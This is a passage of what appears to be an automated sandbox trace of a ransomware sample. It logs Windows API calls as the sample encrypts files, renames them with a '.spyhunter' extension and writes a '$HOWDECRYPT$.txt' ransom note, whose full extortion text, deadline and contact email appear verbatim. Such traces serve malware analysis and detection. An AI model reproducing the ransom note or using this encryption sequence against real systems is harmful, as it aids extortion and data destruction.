lpNumberOfBytesRead=0x57e40c*=0x2800, lpOverlapped=0x0) returned 1 [0178.189] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0178.189] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e40c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e40c*=0x2800, lpOverlapped=0x0) returned 1 [0178.189] GetProcessHeap () returned 0x2c0000 [0178.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0178.189] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.189] WriteFile (in: hFile=0x178, lpBuffer=0x57e44c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e40c, lpOverlapped=0x0 | out: lpBuffer=0x57e44c*, lpNumberOfBytesWritten=0x57e40c*=0x4, lpOverlapped=0x0) returned 1 [0178.240] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e40c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e40c*=0x30, lpOverlapped=0x0) returned 1 [0178.240] CloseHandle (hObject=0x178) returned 1 [0178.240] GetProcessHeap () returned 0x2c0000 [0178.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0178.240] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\msdia90.dll.spyhunter") returned 81 [0178.240] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\msdia90.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vc\\msdia90.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\msdia90.dll.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vc\\msdia90.dll.spyhunter")) returned 1 [0178.242] GetProcessHeap () returned 0x2c0000 [0178.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0178.242] GetProcessHeap () returned 0x2c0000 [0178.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.242] GetProcessHeap () returned 0x2c0000 [0178.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7c540 | out: hHeap=0x2c0000) returned 1 [0178.242] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\TextConv\\en-US\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\en-us\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0178.243] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0178.243] WriteFile (in: hFile=0x178, lpBuffer=0x57e37f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e4a8, lpOverlapped=0x0 | out: lpBuffer=0x57e37f*, lpNumberOfBytesWritten=0x57e4a8*=0x127, lpOverlapped=0x0) returned 1 [0178.244] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0178.244] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e4a8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e4a8*=0x2ac, lpOverlapped=0x0) returned 1 [0178.244] CloseHandle (hObject=0x178) returned 1 [0178.244] GetProcessHeap () returned 0x2c0000 [0178.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5d6c0 | out: hHeap=0x2c0000) returned 1 [0178.244] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e448 | out: pbBuffer=0x57e448) returned 1 [0178.244] GetProcessHeap () returned 0x2c0000 [0178.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.244] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e440*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e440*=0x30) returned 1 [0178.244] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Stars.htm" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\stars.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.244] GetProcessHeap () returned 0x2c0000 [0178.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.245] GetProcessHeap () returned 0x2c0000 [0178.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee9990 | out: hHeap=0x2c0000) returned 1 [0178.245] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e440 | out: pbBuffer=0x57e440) returned 1 [0178.245] GetProcessHeap () returned 0x2c0000 [0178.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.245] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e438*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e438*=0x30) returned 1 [0178.245] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\SoftBlue.jpg" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\softblue.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.245] GetProcessHeap () returned 0x2c0000 [0178.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.245] GetProcessHeap () returned 0x2c0000 [0178.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a93d0 | out: hHeap=0x2c0000) returned 1 [0178.245] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e440 | out: pbBuffer=0x57e440) returned 1 [0178.245] GetProcessHeap () returned 0x2c0000 [0178.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.245] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e438*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e438*=0x30) returned 1 [0178.245] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\soft blue.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.245] GetProcessHeap () returned 0x2c0000 [0178.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.246] GetProcessHeap () returned 0x2c0000 [0178.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7418 | out: hHeap=0x2c0000) returned 1 [0178.246] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e438 | out: pbBuffer=0x57e438) returned 1 [0178.246] GetProcessHeap () returned 0x2c0000 [0178.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.246] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e430*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e430*=0x30) returned 1 [0178.246] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\shadesofblue.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.246] GetProcessHeap () returned 0x2c0000 [0178.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.246] GetProcessHeap () returned 0x2c0000 [0178.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e4c160 | out: hHeap=0x2c0000) returned 1 [0178.246] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e438 | out: pbBuffer=0x57e438) returned 1 [0178.246] GetProcessHeap () returned 0x2c0000 [0178.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.246] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e430*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e430*=0x30) returned 1 [0178.246] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Shades of Blue.htm" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\shades of blue.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.246] GetProcessHeap () returned 0x2c0000 [0178.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.247] GetProcessHeap () returned 0x2c0000 [0178.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e4c068 | out: hHeap=0x2c0000) returned 1 [0178.247] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e430 | out: pbBuffer=0x57e430) returned 1 [0178.247] GetProcessHeap () returned 0x2c0000 [0178.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.247] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e428*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e428*=0x30) returned 1 [0178.247] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Roses.jpg" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\roses.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.247] GetProcessHeap () returned 0x2c0000 [0178.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.247] GetProcessHeap () returned 0x2c0000 [0178.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee98a8 | out: hHeap=0x2c0000) returned 1 [0178.247] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e430 | out: pbBuffer=0x57e430) returned 1 [0178.247] GetProcessHeap () returned 0x2c0000 [0178.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.247] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e428*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e428*=0x30) returned 1 [0178.247] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Roses.htm" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\roses.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.247] GetProcessHeap () returned 0x2c0000 [0178.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.248] GetProcessHeap () returned 0x2c0000 [0178.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee97c0 | out: hHeap=0x2c0000) returned 1 [0178.248] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e428 | out: pbBuffer=0x57e428) returned 1 [0178.248] GetProcessHeap () returned 0x2c0000 [0178.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.248] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e420*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e420*=0x30) returned 1 [0178.248] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Peacock.jpg" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\peacock.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.248] GetProcessHeap () returned 0x2c0000 [0178.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.248] GetProcessHeap () returned 0x2c0000 [0178.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee96d8 | out: hHeap=0x2c0000) returned 1 [0178.248] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e428 | out: pbBuffer=0x57e428) returned 1 [0178.248] GetProcessHeap () returned 0x2c0000 [0178.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.248] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e420*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e420*=0x30) returned 1 [0178.248] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Peacock.htm" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\peacock.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.249] GetProcessHeap () returned 0x2c0000 [0178.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.249] GetProcessHeap () returned 0x2c0000 [0178.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee95f0 | out: hHeap=0x2c0000) returned 1 [0178.249] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e420 | out: pbBuffer=0x57e420) returned 1 [0178.249] GetProcessHeap () returned 0x2c0000 [0178.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.249] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e418*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e418*=0x30) returned 1 [0178.249] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\orangecircles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.249] GetProcessHeap () returned 0x2c0000 [0178.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.249] GetProcessHeap () returned 0x2c0000 [0178.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e4bf70 | out: hHeap=0x2c0000) returned 1 [0178.249] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e420 | out: pbBuffer=0x57e420) returned 1 [0178.249] GetProcessHeap () returned 0x2c0000 [0178.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.249] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e418*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e418*=0x30) returned 1 [0178.249] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\orange circles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.250] GetProcessHeap () returned 0x2c0000 [0178.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.250] GetProcessHeap () returned 0x2c0000 [0178.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e4be78 | out: hHeap=0x2c0000) returned 1 [0178.250] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e418 | out: pbBuffer=0x57e418) returned 1 [0178.250] GetProcessHeap () returned 0x2c0000 [0178.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.250] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e410*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e410*=0x30) returned 1 [0178.250] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\handprints.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.250] GetProcessHeap () returned 0x2c0000 [0178.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.250] GetProcessHeap () returned 0x2c0000 [0178.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e80e40 | out: hHeap=0x2c0000) returned 1 [0178.250] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e418 | out: pbBuffer=0x57e418) returned 1 [0178.250] GetProcessHeap () returned 0x2c0000 [0178.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.250] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e410*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e410*=0x30) returned 1 [0178.251] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\hand prints.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.251] GetProcessHeap () returned 0x2c0000 [0178.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.251] GetProcessHeap () returned 0x2c0000 [0178.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e80d50 | out: hHeap=0x2c0000) returned 1 [0178.251] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e410 | out: pbBuffer=0x57e410) returned 1 [0178.251] GetProcessHeap () returned 0x2c0000 [0178.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.251] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e408*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e408*=0x30) returned 1 [0178.251] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\greenbubbles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.251] GetProcessHeap () returned 0x2c0000 [0178.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.251] GetProcessHeap () returned 0x2c0000 [0178.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e4bd80 | out: hHeap=0x2c0000) returned 1 [0178.251] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e410 | out: pbBuffer=0x57e410) returned 1 [0178.251] GetProcessHeap () returned 0x2c0000 [0178.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.251] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e408*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e408*=0x30) returned 1 [0178.252] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\green bubbles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.252] GetProcessHeap () returned 0x2c0000 [0178.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.252] GetProcessHeap () returned 0x2c0000 [0178.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e4bc88 | out: hHeap=0x2c0000) returned 1 [0178.252] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e408 | out: pbBuffer=0x57e408) returned 1 [0178.252] GetProcessHeap () returned 0x2c0000 [0178.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.252] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e400*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e400*=0x30) returned 1 [0178.252] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\garden.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.252] GetProcessHeap () returned 0x2c0000 [0178.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.252] GetProcessHeap () returned 0x2c0000 [0178.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee9508 | out: hHeap=0x2c0000) returned 1 [0178.252] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e408 | out: pbBuffer=0x57e408) returned 1 [0178.252] GetProcessHeap () returned 0x2c0000 [0178.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.252] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e400*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e400*=0x30) returned 1 [0178.253] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Garden.htm" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\garden.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.253] GetProcessHeap () returned 0x2c0000 [0178.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0178.253] GetProcessHeap () returned 0x2c0000 [0178.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee9420 | out: hHeap=0x2c0000) returned 1 [0178.253] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e400 | out: pbBuffer=0x57e400) returned 1 [0178.253] GetProcessHeap () returned 0x2c0000 [0178.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0178.253] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e3f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e3f8*=0x30) returned 1 [0178.253] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 